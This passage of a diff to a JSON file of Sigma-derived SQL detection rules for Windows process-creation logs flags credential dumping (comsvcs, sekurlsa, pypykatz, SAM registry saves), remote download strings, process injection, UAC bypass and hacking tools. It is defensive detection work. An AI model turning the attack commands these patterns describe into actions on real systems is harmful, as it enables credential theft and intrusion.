'\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": 
"9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": 
"07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": 
"proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE 
'\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": 
"811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + 
"id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program 
Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + 
"title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": 
"proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, 
